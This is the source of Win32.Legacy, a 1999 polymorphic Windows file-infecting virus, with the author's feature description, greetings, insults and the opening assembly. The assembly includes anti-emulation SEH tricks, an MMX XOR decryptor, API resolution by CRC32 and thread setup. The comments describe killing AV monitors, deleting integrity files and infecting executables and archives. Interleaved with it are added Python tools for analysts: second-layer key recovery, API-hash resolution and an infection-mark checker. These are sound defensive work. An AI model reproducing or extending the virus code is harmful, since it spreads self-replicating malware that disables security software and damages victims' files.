; [Win32.Legacy] - Multithreaded/Poly/EPO/MMX/RDA/AntiAV/PE/RAR/ARJ, etc.
;
; Copyright (c) 1999 by Billy Belcebu/iKX

;
; [Introduction]
;
; This is a polymorphic, heavily armoured multitask virus. It's undetectable
; by all the most powerful AVs (August 1999) such as AVP, NOD-iCE, etc. It
; has two layers of encryption (as my Win32.Thorin): the first one is
; polymorphic, made by MMXE v1.01, and the second one is an anti-debug/
; anti-emulator one, using also MMX opcodes if available. So, this is the
; world's first virus using MMX opcodes, and I am proud of it! :) Well, the
; polymorphic engine has a sorta plug-in, called PHIRE v1.00, that is able
; to generate a 256-byte polymorphic block of code that will be placed at
; the host entrypoint to pass the control to the polymorphic decryptor at
; the last section. So, it's something like an EPO feature. This is also my
; first virus that infects archives (RAR & ARJ). This virus also has RDA
; features, by means of my new engine called IENC, that works with little
; blocks of code instead of the whole virus. There are 13h ;) routines in
; this virus that are encrypted independently from the two normal layers
; of the virus... It's a great feature :)
; This babe makes my Thorin seem a joke... It beats Thorin in almost every
; aspect. The only bad point this virus has is, in some extreme cases, the
; speed. I've tried to fix that by optimizing a bit the thread execution,
; and its order. Also, I've made the virus be executed with the highest
; priority of execution, so the delay will be minimal (I hope), and in the
; fastest PCs it will be unnoticeable. It's possible that the virus has
; bugs, but in all my tests it worked perfectly. But nothing is perfect...
; Well, that's too much for an introduction. Let's see a deeper description
; of all this.
;

; [Threads]
;
; The virus' execution is as follows:
;
;   Infected file -> Virus -> Main thread -> Thread 1  \
;                                            Thread 2   | launched and executed
;                                            Thread 3   | at the same time
;                                            Thread 4  /
;                                            Thread 5 -> Thread 6  (one after
;                                                                   the other)
;
; So, as you can see, the virus body launches a thread, the main thread, and
; the main thread launches 6 threads, and controls their execution flow: the
; first 4 ones are launched and executed at the same time, while the following
; 2 must follow one another. Let's see what each of the threads does.
;
; Thread 1: This thread is executed the first, and it consists in a
;           loop that terminates the process of AVP Monitor and
;           AMON (monitor of NOD-iCE).
; Thread 2: This thread is the anti-debugging one. Application level
;           debuggers should die with it.
; Thread 3: This thread deletes from the current directory most of
;           all the integrity checks of all AV and programs.
; Thread 4: This thread hooks all possible APIs from the host import
;           table, so it is the per-process residence thread.
; Thread 5: This thread prepares the virus for infection, setting up
;           the directories to infect, etc.
; Thread 6: This thread is used for infecting in all the retrieved
;           directories all EXE, SCR, CPL, RAR, ARJ files.
;
; Each thread is protected by a SEH handler, so we can handle all the
; possible errors that could happen in their execution. This adds more
; security to the virus, and makes it become lotsa more robust.
;

; [Engines]
;
; This virus features 3 engines: MMXE v1.01, PHIRE v1.00 and IENC v1.00. Let's
; see what each one of them does:
;
; MMXE:  This engine will generate two decryptors, that will be able
;        to decrypt the first encryption layer of the virus (but the
;        only one that is polymorphic). Why two decryptors? Well, the
;        execution of one or another depends on the existence of the
;        MMX opcodes (i.e. if the CPU is MMX). The first one, the one
;        that will be executed first, has MMX opcodes used as garbage,
;        and its decryption operation is also an MMX opcode. The second
;        decryptor is an 'usual' polymorphic one.
; PHIRE: This is a plug-in for MMXE. It generates a block of 256 bytes
;        of polymorphic code that will be placed at the entrypoint of
;        the host. The particularity of that code is, besides the
;        entrypoint obscuring (EPO) ability that it gives to the virus,
;        that the generated code will set up an exception handler (SEH),
;        to later generate a fault, thus passing the control to the
;        handler, that will pass the control to the MMXE decryptor.
;        This will stop every known emulator.
; IENC:  The internal encryptor is a RDA encryptor/decryptor that brings
;        you the possibility of encrypting/decrypting blocks of code
;        inside the virus itself. It's very simple, besides that it is
;        very useful for annoying a bit more the AV people. And that is
;        my target.
;

; [Decryption]
;
; Glossary:
;   Poly #1 - PHIRE generated block (overwrites the first bytes of the host
;             entrypoint)
;   Poly #2 - MMXE generated decryptor
;   Encr #3 - Second encryption layer
;
;   +--------------+
;   |   Poly #1    |  Now jump over all the encrypted stuff...
;   +--------------+
;   | rest of host |  ...till we reach the last section
;   +--------------+
;   |   Poly #2    |  Now decrypt the next layer
;   +--------------+
;   |   Encr #3    |  Final decryption of virus body
;   +--------------+
;   | Virus code!  | -> Some independent blocks of this are also encrypted
;   +--------------+
;
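The second layer (Encr #3) is not polymorphic: the decryptor further down (`decryptor:`) XORs the body from the `crypt` label to `virus_end` one dword at a time with the 32-bit value patched into `key`, and the first bytes at `crypt` are the constant string `00h,"Welcome to the realm of the Legacy of Kings...",00h`. That known plaintext is all an analyst needs to strip the layer from a memory dump without running the sample. The following is an added Python example, not code from the original source; the encrypted body used in the test is constructed, and the only assumption is that the dump starts exactly at `crypt`.

```python
"""Recover the key of Win32.Legacy's second (non-polymorphic) XOR layer.

Added example, not code from the original source. The decryptor XORs the body
from the `crypt` label up to `virus_end`, one little-endian dword at a time,
with the fixed 32-bit key patched into `key`. The first bytes at `crypt` are
the constant 00h,"Welcome to the realm of the Legacy of Kings...",00h, so an
analyst holding a dump of the still-encrypted body gets the key from the first
dword (C0 XOR P0) and uses the rest of the string to verify it. The sample body
used in the test is constructed here.
"""
import struct

# Constant plaintext at `crypt` (48 bytes, a whole number of dwords).
KNOWN_PLAINTEXT = b"\x00Welcome to the realm of the Legacy of Kings...\x00"
VERIFY_LEN = len(KNOWN_PLAINTEXT) - len(KNOWN_PLAINTEXT) % 4


def xor_dwords(data: bytes, key: int) -> bytes:
    """XOR every whole little-endian dword with key. A trailing 1-3 bytes are
    left untouched, matching the decryptor's loop count of (size / 4)."""
    out = bytearray(data)
    for off in range(0, len(data) - len(data) % 4, 4):
        (v,) = struct.unpack_from("<I", data, off)
        struct.pack_into("<I", out, off, v ^ key)
    return bytes(out)


def recover_key(encrypted: bytes) -> int:
    """Known-plaintext attack on the first dword: key = C0 ^ P0."""
    if len(encrypted) < 4:
        raise ValueError("need at least one dword")
    (c0,) = struct.unpack_from("<I", encrypted, 0)
    (p0,) = struct.unpack_from("<I", KNOWN_PLAINTEXT, 0)
    return c0 ^ p0


def decrypt_second_layer(encrypted: bytes):
    """Return (key, plaintext). Raises ValueError when the remainder of the
    known string does not verify, i.e. the blob does not start at `crypt` or
    the layer is not a single-dword XOR."""
    if len(encrypted) < VERIFY_LEN:
        raise ValueError("blob shorter than the known plaintext")
    key = recover_key(encrypted)
    plain = xor_dwords(encrypted, key)
    if plain[:VERIFY_LEN] != KNOWN_PLAINTEXT[:VERIFY_LEN]:
        raise ValueError("known plaintext does not verify")
    return key, plain


def is_legacy_body(encrypted: bytes) -> bool:
    """True when the blob verifies as an encrypted Legacy body."""
    try:
        decrypt_second_layer(encrypted)
        return True
    except ValueError:
        return False
```

The verification step matters: the first dword always "decrypts" correctly because it is what the key was derived from, so only the remaining 44 bytes of the string tell a real Legacy body apart from random data.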

; [APIs used]
;
; They are retrieved knowing only their CRC32. This, as you can see, is a
; great saving of bytes.
;
; KERNEL32.DLL  - FindFirstFileA, FindNextFileA, FindClose,
;                 CreateFileA, DeleteFileA, SetFilePointer,
;                 SetFileAttributesA, CloseHandle,
;                 GetCurrentDirectoryA, SetCurrentDirectoryA,
;                 GetWindowsDirectoryA, GetSystemDirectoryA,
;                 CreateFileMappingA, MapViewOfFile,
;                 UnmapViewOfFile, SetEndOfFile, GetProcAddress,
;                 LoadLibraryA, GetSystemTime, CreateThread,
;                 WaitForSingleObject, ExitThread, GetTickCount,
;                 FreeLibrary, WriteFile, GlobalAlloc, GlobalFree,
;                 GetFileSize, GetFileAttributesA, ReadFile,
;                 GetCurrentProcess, GetPriorityClass,
;                 SetPriorityClass
;
; USER32.DLL    - FindWindowA, PostMessageA, MessageBoxA
; ADVAPI32.DLL  - RegCreateKeyExA, RegSetValueExA
;

; [APIs hooked]
;
; All these APIs are part of the '@@hookz' structure (see data zone of virus)
; and they are got from the import table only knowing its CRC32. This is a
; nice feature, we save many bytes with it.
;
; With generic hooker  - MoveFileA
;                      - CopyFileA
;                      - GetFullPathNameA
;                      - DeleteFileA
;                      - WinExec
;                      - CreateFileA
;                      - CreateProcessA
;                      - GetFileAttributesA
;                      - SetFileAttributesA
;                      - _lopen
;                      - MoveFileExA
;                      - CopyFileExA
;                      - OpenFile
;
; With special hooker  - GetProcAddress
;                      - FindFirstFileA
;                      - FindNextFileA
;
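Both the export-table walk ([APIs used]) and the import-table hooks ([APIs hooked]) identify functions by the CRC32 of their name, so a sample carries no API strings at all. The analyst's counter is a dictionary: hash a candidate list of export names and look the stored dwords up. The following is an added Python example, not code from the original source. It assumes the virus's CRC32 is the standard reflected CRC-32 (polynomial EDB88320h, initial value and final XOR FFFFFFFFh, which is what zlib.crc32 computes) taken over the ASCII name without its terminating NUL, and that the `@@namezcrc32` array is one little-endian dword per hash; the candidate names are the ones listed in the two sections above and the dword array in the test is constructed.

```python
"""Map CRC32 API-name hashes back to names.

Added example; not part of the original source. Win32.Legacy keeps only the
CRC32 of every API it needs (the @@namezcrc32 array for the export-table walk,
the '@@hookz' structure for the import-table hooks) and compares hashes while
scanning the tables. Reversing that is a dictionary problem. Assumptions: the
hash is the standard reflected CRC-32 (polynomial EDB88320h, init/final XOR
FFFFFFFFh) over the ASCII name without the NUL, i.e. zlib.crc32; if the
sample's routine differs, only api_crc32() changes. Names are the ones the
page lists; the dword array in the test is constructed.
"""
import struct
import zlib
from typing import Dict, Iterable, List, Optional

KERNEL32 = ["FindFirstFileA", "FindNextFileA", "FindClose", "CreateFileA",
            "DeleteFileA", "SetFilePointer", "SetFileAttributesA", "CloseHandle",
            "GetCurrentDirectoryA", "SetCurrentDirectoryA", "GetWindowsDirectoryA",
            "GetSystemDirectoryA", "CreateFileMappingA", "MapViewOfFile",
            "UnmapViewOfFile", "SetEndOfFile", "GetProcAddress", "LoadLibraryA",
            "GetSystemTime", "CreateThread", "WaitForSingleObject", "ExitThread",
            "GetTickCount", "FreeLibrary", "WriteFile", "GlobalAlloc", "GlobalFree",
            "GetFileSize", "GetFileAttributesA", "ReadFile", "GetCurrentProcess",
            "GetPriorityClass", "SetPriorityClass",
            # hooked through the host import table
            "MoveFileA", "CopyFileA", "GetFullPathNameA", "WinExec",
            "CreateProcessA", "_lopen", "MoveFileExA", "CopyFileExA", "OpenFile"]
USER32 = ["FindWindowA", "PostMessageA", "MessageBoxA"]
ADVAPI32 = ["RegCreateKeyExA", "RegSetValueExA"]


def api_crc32(name: str) -> int:
    """CRC-32 of the ASCII export name, without the terminating NUL (assumed)."""
    return zlib.crc32(name.encode("ascii")) & 0xFFFFFFFF


def build_hash_table(names: Iterable[str]) -> Dict[int, str]:
    """hash -> name; refuses silently ambiguous tables."""
    table: Dict[int, str] = {}
    for n in names:
        h = api_crc32(n)
        if table.get(h, n) != n:  # two candidate names with the same CRC32
            raise ValueError(f"CRC32 collision: {table[h]} vs {n}")
        table[h] = n
    return table


def resolve_hashes(hashes: Iterable[int], table: Dict[int, str]) -> List[Optional[str]]:
    """Unknown hashes resolve to None; feeding a full export list (every name
    exported by kernel32.dll) instead of this short list widens the dictionary."""
    return [table.get(h & 0xFFFFFFFF) for h in hashes]


def pack_dwords(*values: int) -> bytes:
    """Little-endian dword array, the assumed layout of @@namezcrc32."""
    return struct.pack("<%dI" % len(values), *values)


def resolve_dword_array(blob: bytes, table: Dict[int, str]) -> List[Optional[str]]:
    """Decode a dword array such as @@namezcrc32 and resolve each entry."""
    count = len(blob) // 4
    return resolve_hashes(struct.unpack("<%dI" % count, blob[:count * 4]), table)


API_TABLE = build_hash_table(KERNEL32 + USER32 + ADVAPI32)
```

Against a real sample you would feed `resolve_dword_array` the bytes at `@@namezcrc32` from a decrypted dump and replace the candidate lists with the export names of the DLLs on the victim system; a hash that stays unresolved is either a collision with a name outside the list or a different CRC variant.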

; [Features]
;
; Now here will go the blessed list of what this babe is able to do:
;
;  - Infects EXE, SCR and CPL files.
;  - Drops an infected file to RAR and ARJ archives (dropper is packed).
;    All targets (EXE/SCR/CPL/RAR/ARJ) are infected if they:
;      - are in \Windows directory
;      - are in \Windows\System directory
;      - are in current directory
;      - are accessed by one of the hooked functions
;  - Obtains API addresses knowing only its CRC32 (ET & IT).
;  - EntryPoint Obscuring (EPO), using PHIRE v1.00.
;  - Two layers of encryption:
;      - MMXE generated decryptor
;      - Simple non-poly MMX decryptor, also anti-emulators.
;  - Some blocks of code are encrypted (RDA) with IENC v1.00.
;  - Anti-emulation and anti-heuristic techniques.
;  - Anti-monitors: kills the process of AVP Monitor and AMON.
;  - Anti-debugging (SEH, IsDebuggerPresent, FS:[20h], threads, SoftICE).
;  - Multithread (see 'Threads' description above).
;  - Per-process residence (import table/GetProcAddress).
;  - Fast infector (FindFirstFileA/FindNextFileA).
;  - Kills AV CRC files.
;  - Infects all PEs without caring about their ImageBase.
;  - Avoids problems with .reloc section.
;  - Able to work under Win95, Win98, WinNT and Win2k.
;  - Payload: shows a lame messagebox with a lame message, and after it
;    makes a little change.
;
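The reinfection check in the infection routine (`cmp dword ptr [esi+MARK],INF_MARK`, with `MARK equ 04ch` and `INF_MARK equ "Ycgl"` in the constants block) is also the cleanest static indicator for an incident responder, and the same routine zeroes the base-relocation directory (`[edi+0A0h]`/`[edi+0A4h]`) and ORs `SECTION_FLAGS` into the last section. The following is an added Python example, not code from the original source: a header-only checker for those three side effects. It assumes MASM's byte order for multi-character constants (the source itself tests for "PE\0\0" with the constant "EP", so "Ycgl" lands in the file as the bytes "lgcY"), takes the mark's letter case as printed in the constants block, and locates the section table through SizeOfOptionalHeader rather than the virus's NumberOfRvaAndSizes arithmetic. The sample PE it is tested on is constructed and contains no code.

```python
"""Static check for the Win32.Legacy infection mark and its header side effects.

Added example, not code from the original source. It looks for what the
infection routine writes into a PE: the dword INF_MARK at offset MARK (4Ch)
of the PE header (the Win32VersionValue field of the optional header), the
base-relocation directory zeroed ([PE+0A0h]/[PE+0A4h]) and the last section's
Characteristics OR'ed with SECTION_FLAGS (CODE|EXECUTE|WRITE). Assumptions:
MASM stores "Ycgl" with 'Y' in the most significant byte, so the file bytes
are "lgcY"; the letter case is as printed in the constants block. The sample
PE is constructed.
"""
import struct

INF_MARK = b"lgcY"            # "Ycgl" as a MASM dword, little-endian on disk
MARK_OFFSET = 0x4C            # relative to the PE signature
SECTION_FLAGS = 0x00000020 | 0x20000000 | 0x80000000
RELOC_DIR = 5                 # IMAGE_DIRECTORY_ENTRY_BASERELOC


def parse_pe(data: bytes) -> dict:
    """Return the header fields the check needs; ValueError if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    (nsec,) = struct.unpack_from("<H", data, e_lfanew + 0x06)
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 0x14)
    (nrva,) = struct.unpack_from("<I", data, e_lfanew + 0x74)
    reloc = (0, 0)
    if nrva > RELOC_DIR:
        reloc = struct.unpack_from("<II", data, e_lfanew + 0x78 + 8 * RELOC_DIR)
    sec_base = e_lfanew + 0x18 + opt_size
    sections = []
    for i in range(nsec):
        off = sec_base + i * 0x28
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        (chars,) = struct.unpack_from("<I", data, off + 0x24)
        sections.append({"name": data[off:off + 8].rstrip(b"\0"), "va": va,
                         "rawsize": rawsize, "rawptr": rawptr, "chars": chars})
    mark = data[e_lfanew + MARK_OFFSET:e_lfanew + MARK_OFFSET + 4]
    return {"mark": mark, "reloc": tuple(reloc), "nrva": nrva, "sections": sections}


def check_legacy(data: bytes) -> dict:
    """The mark alone is what the virus itself tests before reinfecting; the
    other two are corroboration only (many clean EXEs have no .reloc)."""
    pe = parse_pe(data)
    last = pe["sections"][-1] if pe["sections"] else None
    marked = pe["mark"] == INF_MARK
    relocs_zeroed = pe["nrva"] > RELOC_DIR and pe["reloc"] == (0, 0)
    last_rwx = last is not None and (last["chars"] & SECTION_FLAGS) == SECTION_FLAGS
    if marked:
        verdict = "infected"
    elif relocs_zeroed and last_rwx:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"marked": marked, "relocs_zeroed": relocs_zeroed,
            "last_section_rwx": last_rwx, "verdict": verdict}


def build_sample_pe(infected: bool) -> bytes:
    """Constructed 0x400-byte PE32 header image (.text + .data, no real code)
    used only to exercise the checker; 'infected' applies the header changes
    the infection routine makes."""
    e_lfanew, opt = 0x80, 0x80 + 0x18
    img = bytearray(0x400)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, e_lfanew)
    img[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<HH", img, e_lfanew + 4, 0x14C, 2)      # i386, 2 sections
    struct.pack_into("<H", img, e_lfanew + 0x14, 0xE0)       # SizeOfOptionalHeader
    struct.pack_into("<H", img, opt, 0x10B)                   # PE32 magic
    struct.pack_into("<I", img, opt + 0x10, 0x1010)           # AddressOfEntryPoint
    struct.pack_into("<I", img, opt + 0x1C, 0x400000)         # ImageBase
    struct.pack_into("<II", img, opt + 0x20, 0x1000, 0x200)   # Section/FileAlignment
    struct.pack_into("<II", img, opt + 0x38, 0x4000, 0x400)   # SizeOfImage/SizeOfHeaders
    struct.pack_into("<I", img, opt + 0x5C, 16)               # NumberOfRvaAndSizes
    struct.pack_into("<II", img, opt + 0x60 + 8 * RELOC_DIR, 0x3000, 0x40)  # .reloc dir
    sec = opt + 0xE0
    for i, (name, va, raw, ptr, chars) in enumerate([
            (b".text", 0x1000, 0x200, 0x400, 0x60000020),    # CODE|EXECUTE|READ
            (b".data", 0x2000, 0x200, 0x600, 0xC0000040)]):  # IDATA|READ|WRITE
        off = sec + i * 0x28
        img[off:off + 8] = name.ljust(8, b"\0")
        struct.pack_into("<IIII", img, off + 8, raw, va, raw, ptr)
        struct.pack_into("<I", img, off + 0x24, chars)
    if infected:
        img[e_lfanew + MARK_OFFSET:e_lfanew + MARK_OFFSET + 4] = INF_MARK
        struct.pack_into("<II", img, opt + 0x60 + 8 * RELOC_DIR, 0, 0)
        flags_off = sec + 0x28 + 0x24
        (c,) = struct.unpack_from("<I", img, flags_off)
        struct.pack_into("<I", img, flags_off, c | SECTION_FLAGS)
    return bytes(img)
```

Note what the checker cannot see: because the PHIRE block is written over the first bytes of the original entrypoint (and `restoreoldbytes` puts them back at run time), AddressOfEntryPoint itself stays inside the host's code section, so "entrypoint in the last section" is not a usable heuristic for this family.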

; [Greetings (random order)]
;
; Qozah/29A      -> Finally you did it! Win32.Unreal rulez!
; Benny/29A      -> I'll wait for your meta! Btw, bring me a Czech beer
; Vecna          -> Pray to the real and only god... yourself!
; Super/29A      -> Thanx for pointing me bugs and optimizations...
; b0z0/iKX       -> I recommend you a Padanian band called Lacuna Coil
; StarZer0/iKX   -> What did you say to yer mother for going to Amsterdam?
; int13h         -> I'm eagerly waiting for your letter!
; Ypsilon        -> Finish VAS, goddamit!!
; GriYo/29A      -> The only one who calls his viruses "crap" :)
; MDriller/29A   -> You help me, I help you... compensation law ;)
; Owl[FS]        -> You'll find the perfect girl for your needs...
; VirusBust/29A  -> I hope you're happy with your new marital status ;)
; MrSandman      -> Same to you...
; jqwerty        -> Even if it hurts us, well, I say the same to you ;)
; Wintermute     -> Someday you'll understand these mon?gamos x-D
; TCP/29A        -> I'll wait for your HLL PE infector :)
; Rajaat         -> The Twisted Nails of Faith... COF rulez!
; Somniun        -> Send me a mail, please
; Septic         -> You'd have my vote... sure!
; Technophunk/TI -> I recommend you to hear Marilyn Manson...
; Mandragore     -> Mail me pleeeeese
; TheWizard      -> Let's see when I get to see something of yours for Win32...
; Navi/Phymosys  -> And the #9? :)
; Frontis        -> I love your 8x Plextor!
; Nigr0          -> I'll retire when you join some group :)
; SlageHammer    -> Come to Valencia!
; T-2000         -> I didn't like to be infected with yer Kriz ;)
; Zaxon          -> This virus below is going to infect you...
; Gigabyte[UC]   -> What about that VBS worm?
; Yesna          -> Bitch!
; Lord Julus     -> Get a Blind Guardian CD!
; Hansi Kürsch   -> I hope you'll be able to compose again soon!
; J.R.R. Tolkien -> Awesome folklore!
; Karl Marx      -> For giving me something to believe in.
;

; [Fucks]
;
; J. M. Aznar    -> I'll dance over your grave, fascist sucker
; E. Zaplana     -> What's a guy from Murcia doing presiding over my region?
; J. Gil y Gil   -> He has a statue of Franco... no comments.
; A. Pinochet    -> To prison, motherfucker!
; F. Franco      -> I'm happy: you're dead
; A. Hitler      -> The worst in all the mankind history
; S. Milosevic   -> The Hitler of our days
; B. Yeltsin     -> Stop drinking vodka!
; All the USA    -> You can control other governments, but not me.
;

; [Final thoughts]
;
; This virus (and its possible next versions) will be my last "megainfector".
; I will probably add to it ZIP infection, a compression engine, a code
; emulator (that I have almost finished) and more features, but I think I'll
; guide my steps to smaller viruses. For example, I am writing another ring-0
; virus, that will feature S&D technology (of course, giving the deserved
; greet to SSR), and I am writing some engines such as a compression one, a
; code emulator, a self-emulated poly engine, and much more. Also, I'm making
; the first steps of the ITXOITEN project, building its macros, and developing
; the ITX header. As you can see, I'm really active in code; I hope I'll be
; able to publish some of those things soon. I've also almost finished
; my Virus Writing Guide for Win32, that is, at this moment, much bigger
; than its equivalent for MS-DOS. I hope to finish it soon too. Well... now
; it's my time to talk about "my thing" :) OK, OK, I'll tell you about what
; happened to me this last week... Firstly (and painfully), my beloved
; Panasonic (paid with my own money) has broken up... Secondly, my headphones,
; R.I.P. I think it happened because I recently had a motorbike crash
; (finishing with myself rolling over the fucking road) while hearing music
; with the Discman... And, today, while I was going (again) with the
; motorbike, a fucking bee has bitten me at my face (and now my face seems a
; fucking ball because of it). Damn, this week hasn't been the best one of my
; life. I can only say one thing, that only the Spanish readers will
; understand: Me cago en Dios! (I shit on God!) OK, this is enough for
; today... fade to black...
;
; -To code is like sex: one error, and you'll cry the rest of your life-
;                                                         (Murphy's Law)
;
; (c) 1999 Billy Belcebu/iKX

.586p
.model  flat

extrn   ShellAboutA:proc                ; thanx 4 this c00l API, Vecna
extrn   ExitProcess:proc

TRUE            equ     01h
FALSE           equ     00h
DEBUG           equ     FALSE           ; FALSE enables the SoftICE driver
                                        ; check in thrantidebugger

VIRUS_SIZE      equ     (offset virus_end-offset virus_start)
SHIT_SIZE       equ     (offset delta-offset legacy)
SECTION_FLAGS   equ     00000020h or 20000000h or 80000000h
TEMP_ATTRIBUTES equ     00000080h
N_HANDLES       equ     50d
WFD_HNDSIZE     equ     N_HANDLES*8
N_INFECTIONS    equ     05h
MARK            equ     04ch            ; PE header offset where to put the mark
INF_MARK        equ     "Ycgl"          ; mark for infected PEs
ARCHIVE_MARK    equ     "GL"            ; mark for infected archives
KERNEL_W9X      equ     0BFF70000h      ; Win95/98 kernel
KERNEL_WNT      equ     077F00000h      ; WinNT kernel
KERNEL_W2K      equ     077E00000h      ; Win2000 kernel
NDAY            equ     31d             ; day when activate payload
NMONTH          equ     07d             ; month when activate payload
BILLY_BEL       equ     0BBh            ; any problem? :)
THREAD_SLEEPING equ     00000000h
THREAD_ACTIVE   equ     00000001h

; Interesting macros for my code

cmp_    macro   reg,joff1               ; optimized version of
        inc     reg                     ;   cmp reg,0FFFFFFFFh
        jz      joff1                   ;   jz  joff1
        dec     reg                     ; the code is reduced in 3
        endm                            ; bytes (7-4)

pushs   macro   string2push
        local   __@@__
        call    __@@__
        db      string2push,00h
__@@__:
        endm

eosz_edi macro
        xor     al,al
        scasb
        jnz     $-1
        endm

apicall macro   apioff                  ; optimize muthafucka!
        call    dword ptr [ebp+apioff]
        endm

vsize   macro
        db      VIRUS_SIZE/10000 mod 10 + "0"
        db      VIRUS_SIZE/01000 mod 10 + "0"
        db      VIRUS_SIZE/00100 mod 10 + "0"
        db      VIRUS_SIZE/00010 mod 10 + "0"
        db      VIRUS_SIZE/00001 mod 10 + "0"
        endm

.data

szMessage       db      "First Generation Sample",10
                db      "(c) 1999 Billy Belcebu/iKX",0

; Don't care about what the people think about you; they are too busy
; thinking how to know what do you think of them. (Murphy's Law)

.code

; <---
; Below code (until the loop) doesn't travel with the virus. It putz da correct
; CRC32 of all the code blocks that are going to be encrypted independently
; with IENC...
; --->

legacy1:
        lea     esi,ienc_struc          ; pointer to IENC structure
        mov     ecx,N_IENC_BLOCKS       ; number of code blocks
lgcyl00p:
        lodsw                           ; get size of block
        cwde                            ; clear MSW of eax
        xchg    edi,eax                 ; edi = size
        lodsw                           ; get relative ptr to block
        cwde                            ; clear MSW of eax
        add     eax,offset virus_start  ; RVA >> VA
        pushad                          ; preserve all registers
        xchg    esi,eax                 ; esi = ptr to block
        call    CRC32                   ; get its CRC32
        mov     [esp.Pushad_ebx],eax    ; preserve after popad =)
        popad                           ; restore all regs
        sub     eax,08h                 ; fix pointer
        mov     [eax],ebx               ; store block's CRC32
        loop    lgcyl00p                ; repeat the same with all

; ===========================================================================
; || Virus start ||
; ===========================================================================
;
;   I wanna die young
;   And sell my soul
;   Use up all your drugs
;   And make me cum
;   Yesterday man,
;   I was a nihilist and
;   Now today I'm
;   Just too fucking bored
;
;       -I don't like the drugs but the drugs like me-
;                                      -Marilyn Manson-
;

virus_start     label   byte

legacy:
        db      LIMIT dup (90h)         ; space for the poly decryptor

        pushad                          ; push all da shit
        mov     ebx,esp                 ; anti NOD-iCE trick
        push    cs
        pop     eax
        cmp     ebx,esp
        jnz     real
        call    seh_trick               ; kill emulators
        mov     esp,[esp+08h]
        xor     edx,edx
        pop     dword ptr fs:[edx]
        pop     edx
        jmp     improvised_delta

decryptor:
        pop     esi                     ; esi = ptr to code to decrypt
        mov     ecx,((offset virus_end-offset crypt)/4)
        mov     ebx,12345678h
        org     $-4
key     dd      00000000h
        mov     edi,esi
        pushad
        xor     eax,eax
        inc     eax
        cpuid                           ; check for MMX presence...
        bt      edx,17h                 ; bit 17h, please!
        popad
        jnc     not_mmx                 ; damn!
@@__??:
        db      00Fh,06Eh,00Eh          ; movd  mm1,[esi]
        db      00Fh,06Eh,0D3h          ; movd  mm2,ebx
        db      00Fh,0EFh,0CAh          ; pxor  mm1,mm2
        db      00Fh,07Eh,00Eh          ; movd  [esi],mm1
        add     esi,4                   ; get next dword
        loop    @@__??                  ; and decrypt it
        jmp     realep                  ; jump to unencrypted code
not_mmx:
        lodsd                           ; load dword to decrypt
        xor     eax,ebx                 ; decrypt it
        stosd                           ; store the decrypted dword
        loop    not_mmx                 ; and loop until all decrypted
        jmp     realep                  ; jump to unencrypted code

seh_trick:
        xor     edx,edx
        push    dword ptr fs:[edx]
        mov     fs:[edx],esp
        dec     byte ptr [edx]          ; bye bye emulators
        jmp     realep                  ; die NOD!!! muahahahah!

improvised_delta:
        call    decryptor

; Let me see you stripped...

crypt   label   byte
        db      00h,"Welcome to the realm of the Legacy of Kings...",00h

realep: call    delta                   ; hardest code to understand ;)
delta:  pop     ebp
        mov     eax,ebp
        sub     ebp,offset delta        ; ebp = delta offset
        sub     eax,SHIT_SIZE           ; obtain at runtime the
        sub     eax,00001000h           ; ImageBase of the process
neweip  equ     $-4
        mov     dword ptr [ebp+modbase],eax ; eax = process' ImageBase

        pushad
        call    changeseh               ; SEH rlz :)
        mov     esp,[esp+08h]           ; fix stack
        jmp     restoreseh              ; and restore old SEH handler

changeseh:
        xor     ebx,ebx                 ; ebx = 0
        push    dword ptr fs:[ebx]      ; save old SEH handler
        mov     fs:[ebx],esp            ; set new SEH handler

        call    ienc_decrypt
        dd      00000000h
        dd      eblock1-block1
block1  label   byte
        mov     esi,[esp+48h]           ; get program return address
        mov     ecx,05h                 ; limit
        call    getk32
        or      eax,eax                 ; eax = 0? if so, error...
        jz      restoreseh              ; then we go away...
        mov     dword ptr [ebp+kernel],eax ; eax must be K32 base address

        lea     esi,[ebp+@@namezcrc32]  ; esi = pointer to CRC32 array
        lea     edi,[ebp+@@offsetz]     ; edi = where put addresses
        call    getapis                 ; retrieve all APIs

        lea     edi,[ebp+random_seed]   ; initialize slow random seed
        push    edi
        apicall _GetSystemTime

        apicall _GetCurrentProcess      ; this virus is slow, so I'm
                                        ; looking in this routine
        push    eax                     ; for the wanted speed
        mov     dword ptr [ebp+currentprocesshandle],eax
        push    eax                     ; get the original priority
        apicall _GetPriorityClass       ; class
        mov     dword ptr [ebp+originalpriorityclass],eax
        pop     ecx
        xchg    eax,ecx                 ; fail? duh!
        jecxz   errorcreatingmainthread
        push    80h                     ; set the priority needed for
        push    eax                     ; a faster execution
        apicall _SetPriorityClass

        xor     edx,edx
        lea     eax,[ebp+lpthreadid]
        push    eax                     ; lpThreadId
        push    edx                     ; dwCreationFlags
        push    ebp                     ; lpParameter
        lea     eax,[ebp+mainthread]
        push    eax                     ; lpStartAddress
        push    edx                     ; dwStackSize
        push    edx                     ; lpThreadAttributes
        apicall _CreateThread
        xchg    eax,ecx                 ; error?
        jecxz   errorcreatingmainthread ; damn...

        xor     eax,eax                 ; wait infinite seconds until
        dec     eax                     ; main thread is finished
        push    eax                     ; push -1
        push    ecx                     ; push main thread handle
        apicall _WaitForSingleObject
eblock1 label   byte

        push    12345678h               ; put again the original
originalpriorityclass equ $-4           ; priority of the process for
        push    12345678h               ; avoid suspicions
currentprocesshandle  equ $-4
        apicall _SetPriorityClass

        push    WFD_HNDSIZE             ; hook some mem for WFD_handles
        push    00000000h               ; structure
        apicall _GlobalAlloc
        mov     dword ptr [ebp+wfd_hndinmem],eax

        call    payload                 ; hohohoho!

errorcreatingmainthread:
        or      ebp,ebp                 ; is 1st gen?
        jz      fakehost                ; if so, jump to the fake host

restoreseh:
        xor     ebx,ebx                 ; ebx = 0
        pop     dword ptr fs:[ebx]      ; restore old SEH handler
        pop     eax                     ; remove shit from stack
        popad                           ; restore old registers

        call    restoreoldbytes         ; restore host's 1st bytes

        popad                           ; restore all!
        mov     ebx,12345678h           ; c'mon!
        org     $-4
oldeip  dd      00001000h
        add     ebx,12345678h           ; it's on!
